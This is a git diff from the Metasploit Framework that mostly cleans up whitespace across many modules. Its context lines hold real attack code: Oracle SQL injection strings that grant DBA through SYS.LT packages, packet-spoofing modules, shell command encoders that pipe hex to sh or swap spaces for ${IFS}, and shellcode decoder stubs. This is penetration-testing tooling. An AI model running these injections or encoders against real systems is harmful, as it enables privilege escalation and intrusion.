Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " @@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - + begin print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...") prepare_exec(package) diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 2e9f67042b..d9c647b2f3 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb 
@@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,9 +33,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Nov 11, 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end @@ -40,9 +44,9 @@ class Metasploit3 < Msf::Auxiliary name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" - + package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" clean = "DROP FUNCTION #{cruft}" @@ -62,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - + begin prepare_exec(package1) prepare_exec(package2) diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 134eb3f065..3de3552e81 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting - an sql injection bug in the SYS.LT.FINDRICSET package via Evil - Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on - thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical + This module will escalate a Oracle DB user to DBA by exploiting + an sql injection bug in the SYS.LT.FINDRICSET package via Evil + Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on + thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007. }, 'Author' => ['CG'], @@ -33,9 +37,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 17 2007')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index a870f0d237..9eb54094d2 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,9 +35,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end 
@@ -45,9 +49,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -58,14 +62,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index f573d03db3..e423b0ffef 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,9 +34,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 2009')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end 
@@ -44,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -57,14 +61,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 17dd33be54..0347a6df73 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,9 +33,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 4 2009')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end 
@@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -56,14 +60,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/test/eth_spoof.rb b/modules/auxiliary/test/eth_spoof.rb index 34647ea92a..b954636220 100644 --- a/modules/auxiliary/test/eth_spoof.rb +++ b/modules/auxiliary/test/eth_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture - + def initialize super( 'Name' => 'Simple Ethernet Frame Spoofer', @@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary r.l4.dst_port = 0x42 r.l4.payload = "SPOOOOOFED" r.l4.fix!(r.l3.src_ip, r.l3.dst_ip) - + 1.upto(10) do capture.inject(r.pack) end - + close_pcap() print_status("Finished sending") end - + end diff --git a/modules/auxiliary/test/ip_spoof.rb b/modules/auxiliary/test/ip_spoof.rb index e6fda4d854..cc61dc23d9 100644 
--- a/modules/auxiliary/test/ip_spoof.rb +++ b/modules/auxiliary/test/ip_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple IP Spoofing Tester', @@ -48,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 17 n.l3.id = 0xdead n.l3.ttl = 255 - + n.l4 = Racket::L4::UDP.new n.l4.src_port = 53 n.l4.dst_port = 53 n.l4.payload = "HELLO WORLD" - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - + + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack ret = send(ip,buff) if ret == :done @@ -75,5 +75,5 @@ class Metasploit3 < Msf::Auxiliary return :done end - + end diff --git a/modules/auxiliary/test/recon_passive.rb b/modules/auxiliary/test/recon_passive.rb index 34a1ca514d..f1120e2298 100644 --- a/modules/auxiliary/test/recon_passive.rb +++ b/modules/auxiliary/test/recon_passive.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary [ ['Continuous Port Sweep'] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Continuous Port Sweep' ] 
@@ -39,13 +39,13 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RHOST, Opt::RPORT, - ], self.class) + ], self.class) end def run print_status("Running the simple recon module with action #{action.name}") - + case action.name when 'Continuous Port Sweep' while (true) @@ -56,14 +56,14 @@ class Metasploit3 < Msf::Auxiliary end end end - + def prober begin connect disconnect report_host(:host => datastore['RHOST']) report_service( - :host => datastore['RHOST'], + :host => datastore['RHOST'], :port => datastore['RPORT'], :proto => 'tcp' ) @@ -74,8 +74,7 @@ class Metasploit3 < Msf::Auxiliary else print_status(e.to_s) end - end + end end - -end \ No newline at end of file +end diff --git a/modules/auxiliary/test/scanner_batch.rb b/modules/auxiliary/test/scanner_batch.rb index 13784e4049..47b9948321 100644 --- a/modules/auxiliary/test/scanner_batch.rb +++ b/modules/auxiliary/test/scanner_batch.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,16 +29,16 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end def run_batch_size 3 end - + def run_batch(batch) print_status("Working on batch #{batch.join(",")}") end - -end \ No newline at end of file + +end diff --git a/modules/auxiliary/test/scanner_host.rb b/modules/auxiliary/test/scanner_host.rb index 36d63da935..8417ce4e1c 100644 --- a/modules/auxiliary/test/scanner_host.rb +++ b/modules/auxiliary/test/scanner_host.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end @@ -37,5 +37,4 @@ class Metasploit3 < Msf::Auxiliary print_status("Working on host #{ip}") end - -end \ No newline at end of file +end diff --git a/modules/auxiliary/test/scanner_range.rb b/modules/auxiliary/test/scanner_range.rb index a2adb08887..24c7b2e7ca 100644 --- a/modules/auxiliary/test/scanner_range.rb +++ b/modules/auxiliary/test/scanner_range.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end @@ -37,5 +37,5 @@ class Metasploit3 < Msf::Auxiliary print_status("Working on range #{range}") end - + end \ No newline at end of file diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index d3aa30f470..e658fed70b 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb 
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP Invite Spoof', @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'David Maynor ', 'License' => MSF_LICENSE ) - + deregister_options('Proxies','SSL','RHOST') register_options( [ @@ -38,9 +38,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - + begin - + name=datastore['MSG'] src=datastore['SRCADDR'] connect_udp @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary req << "Contact: " + "\r\n\r\n" udp_sock.put(req) disconnect_udp - + rescue Errno::EACCES end end diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index f3aff8bde8..0873632d69 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -30,17 +30,17 @@ class Metasploit3 < Msf::Encoder 'Arch' => ARCH_CMD) end - + # # Encodes the payload # def encode_block(state, buf) - + # Skip encoding for empty badchars if(state.badchars.length == 0) return buf end - + if (state.badchars.include?("-")) # Then neither of the others will work. Get rid of spaces and hope # for the best. This obviously won't work if the command already @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Encoder buf = encode_block_bash_echo(state,buf) end end - + return buf end @@ -66,26 +66,26 @@ class Metasploit3 < Msf::Encoder # def encode_block_perl(state, buf) - hex = buf.unpack("H*") + hex = buf.unpack("H*") cmd = 'perl -e ' qot = ',-:.=+!@#$%^&' - + # Find a quoting character to use state.badchars.unpack('C*') { |c| qot.delete(c.chr) } - + # Throw an error if we ran out of quotes raise RuntimeError if qot.length == 0 - + sep = qot[0].chr - + # Convert spaces to IFS... if (state.badchars.include?(" ")) cmd.gsub!(/\s/, '${IFS}') end - + # Can we use single quotes to enclose the command string? if (state.badchars.include?("'")) - + if (state.badchars.match(/\(|\)/)) # No paranthesis... 
@@ -93,43 +93,43 @@ class Metasploit3 < Msf::Encoder end cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},qq#{sep}#{hex}#{sep}\\)\\)" - + else if (state.badchars.match(/\(|\)/)) if (state.badchars.include?(" ")) # No spaces allowed, no paranthesis, give up... raise RuntimeError end - + cmd << "'system pack qq#{sep}H*#{sep},qq#{sep}#{hex}#{sep}'" else cmd << "'system(pack(qq#{sep}H*#{sep},qq#{sep}#{hex}#{sep}))'" end end - + return cmd end - + # # Uses bash's echo -ne command to hex encode the command string # def encode_block_bash_echo(state, buf) - + hex = '' - + # Can we use single quotes to enclose the echo arguments? if (state.badchars.include?("'")) hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join else hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" end - + # Are pipe characters restricted? if (state.badchars.include?("|")) # How about backticks? if (state.badchars.include?("`")) # Last ditch effort, dollar paren - if (state.badchars.include?("$") or state.badchars.include?("(")) + if (state.badchars.include?("$") or state.badchars.include?("(")) raise RuntimeError else buf = "$(/bin/echo -ne #{hex})" @@ -140,13 +140,13 @@ class Metasploit3 < Msf::Encoder else buf = "/bin/echo -ne #{hex}|sh" end - + # Remove spaces from the command string if (state.badchars.include?(" ")) buf.gsub!(/\s/, '${IFS}') end - + return buf - end + end end diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb index d2b17b2bba..7f4834710b 100644 --- a/modules/encoders/cmd/ifs.rb +++ b/modules/encoders/cmd/ifs.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -31,13 +31,13 @@ class Metasploit3 < Msf::Encoder
 'Arch' => ARCH_CMD)
 end
-
+
 #
 # Encodes the payload
 #
 def encode_block(state, buf)
 buf.gsub!(/\s/, '${IFS}')
 return buf
- end
+ end
 end
diff --git a/modules/encoders/encoder_test.rb.ut.rb b/modules/encoders/encoder_test.rb.ut.rb
index e639ea25e4..0a39ffe413 100644
--- a/modules/encoders/encoder_test.rb.ut.rb
+++ b/modules/encoders/encoder_test.rb.ut.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -48,4 +48,4 @@ $framework.encoders.each_module { |name, mod|
 $stderr.puts("#{name.ljust(25)}: Passed: #{passed}, Failed: #{failed}, Unique: #{h.keys.length}")
-}
\ No newline at end of file
+}
diff --git a/modules/encoders/generic/none.rb b/modules/encoders/generic/none.rb
index 3d5774a36e..f26a1cc2d8 100644
--- a/modules/encoders/generic/none.rb
+++ b/modules/encoders/generic/none.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -35,4 +35,4 @@ class Metasploit3 < Msf::Encoder
 buf
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/generic/none.rb.ut.rb b/modules/encoders/generic/none.rb.ut.rb
index 5051441f5a..2b257762b1 100644
--- a/modules/encoders/generic/none.rb.ut.rb
+++ b/modules/encoders/generic/none.rb.ut.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Test::Unit::TestCase
 raw, k.encode(raw, '')
 )
 }
-
+
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb
index 3b44ed6ca8..a972d90013 100644
--- a/modules/encoders/mipsbe/longxor.rb
+++ b/modules/encoders/mipsbe/longxor.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::Xor
 'Version' => '$Revision$',
 'Description' => %q{
 Mips Web server exploit friendly xor encoder
- },
+ },
 'Author' => 'Julien Tinnes ',
 'Arch' => ARCH_MIPSBE,
 'License' => MSF_LICENSE,
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor
 number_of_passes=state.buf.length/4+1
 raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240
 raise InvalidPayloadSizeException.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
-
+
 # 16-bits not (again, see below)
 reg_14 = (number_of_passes+1)^0xFFFF
 decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), < '$Revision$',
 'Description' => %q{
 Mips Web server exploit friendly xor encoder
- },
+ },
 'Author' => 'Julien Tinnes ',
 'Arch' => ARCH_MIPSLE,
 'License' => MSF_LICENSE,
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor
 number_of_passes=state.buf.length/4+1
 raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 10240
 raise InvalidPayloadSizeException.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 0
-
+
 # 16-bits not (again, see below)
 reg_14 = (number_of_passes+1)^0xFFFF
 decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), < 4,
 'BlockSize' => 4,
- 'KeyPack' => 'N',
+ 'KeyPack' => 'N',
 })
 end
 #
- # Returns the decoder stub
+ # Returns the decoder stub
 #
 def decoder_stub(state)
 [
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Encoder::Xor
 end
 #
- # Fix up the decoder stub now
+ # Fix up the decoder stub now
 #
 def encode_finalize_stub(state, stub)
 stub[22, 2] = [ state.key.to_i ].pack('N')[0, 2]
@@ -75,4 +75,4 @@ class Metasploit3 < Msf::Encoder::Xor
 state.encoded += [ state.key.to_i ].pack('N')
 end
-end
\ No newline at end of file
+end
diff --git a/modules/encoders/sparc/longxor_tag.rb b/modules/encoders/sparc/longxor_tag.rb
index 55b8fe8d2d..9f2759b3a1 100644
--- a/modules/encoders/sparc/longxor_tag.rb
+++ b/modules/encoders/sparc/longxor_tag.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -29,25 +29,25 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
 {
 'KeySize' => 4,
 'BlockSize' => 4,
- 'KeyPack' => 'N',
+ 'KeyPack' => 'N',
 })
 end
 #
- # Returns the decoder stub
+ # Returns the decoder stub
 #
 def decoder_stub(state)
- Rex::Arch::Sparc.set_dword(state.key, 'l1') +
- "\x20\xbf\xff\xff" + # bn,a _start - 4
- "\x20\xbf\xff\xff" + # bn,a _start
- "\x7f\xff\xff\xff" + # call _start + 4
- "\xea\x03\xe0\x20" + # ld [%o7 + 0x20],%l7
- "\xaa\x9d\x40\x11" + # xorcc %l5,%l1,%l5
- "\xea\x23\xe0\x20" + # st %l5,[%o7 + 0x20]
- "\xa2\x04\x40\x15" + # add %l1,%l5,%l1
- "\x81\xdb\xe0\x20" + # flush %o7 + 0x20
- "\x12\xbf\xff\xfb" + # bnz dec_loop
- "\x9e\x03\xe0\x04" # add %o7,4,%o7
+ Rex::Arch::Sparc.set_dword(state.key, 'l1') +
+ "\x20\xbf\xff\xff" + # bn,a _start - 4
+ "\x20\xbf\xff\xff" + # bn,a _start
+ "\x7f\xff\xff\xff" + # call _start + 4
+ "\xea\x03\xe0\x20" + # ld [%o7 + 0x20],%l7
+ "\xaa\x9d\x40\x11" + # xorcc %l5,%l1,%l5
+ "\xea\x23\xe0\x20" + # st %l5,[%o7 + 0x20]
+ "\xa2\x04\x40\x15" + # add %l1,%l5,%l1
+ "\x81\xdb\xe0\x20" + # flush %o7 + 0x20
+ "\x12\xbf\xff\xfb" + # bnz dec_loop
+ "\x9e\x03\xe0\x04" # add %o7,4,%o7
 end
 #
@@ -67,5 +67,5 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
 badchars ) ? false : true)
 end
-
-end
\ No newline at end of file
+
+end
diff --git a/modules/encoders/x64/xor.rb b/modules/encoders/x64/xor.rb
index 50e7b08271..455da0686a 100644
--- a/modules/encoders/x64/xor.rb
+++ b/modules/encoders/x64/xor.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -33,10 +33,10 @@ class Metasploit3 < Msf::Encoder::Xor
 end
 def decoder_stub( state )
-
+
 # calculate the (negative) block count . We should check this against state.badchars.
 block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
-
+
 decoder = "\x48\x31\xC9" + # xor rcx, rcx
 "\x48\x81\xE9" + block_count + # sub ecx, block_count
 "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Encoder::Xor
 "\x48\x31\x58\x27" + # xor [rax+0x27], rbx
 "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
 "\xE2\xF4" # loop 0x1B
-
+
 state.decoder_key_offset = decoder.index( 'XXXXXXXX' )
 return decoder
diff --git a/modules/encoders/x86/avoid_utf8_tolower.rb b/modules/encoders/x86/avoid_utf8_tolower.rb
index 5d8c05ac3a..9037ea2d5e 100644
--- a/modules/encoders/x86/avoid_utf8_tolower.rb
+++ b/modules/encoders/x86/avoid_utf8_tolower.rb
@@ -3,7 +3,7 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -20,7 +20,7 @@ require 'msf/core'
 # encoder cannot be used with all of the payloads included in the framework.
 # Most notably, this includes windows/shell_reverse_tcp. The reason for this
 # is that some payloads are of a size that leads to a bad character (uppercase
-# character) being generated in the decoder stub header.
+# character) being generated in the decoder stub header.
 #
 # A second thing to consider is that some IP addresses used in payloads are
 # incompatible with this encoder depending on their alignment within the
@@ -47,7 +47,7 @@ require 'msf/core'
 # which uses a series of add or subtract operations on the third chunk of the
 # decoder to produce the actual opcodes of the encoded payload. For each four
 # bytes of encoded data, a sub or add instruction is used in combination with
-# complementary information stored in the third chunk of the decoder.
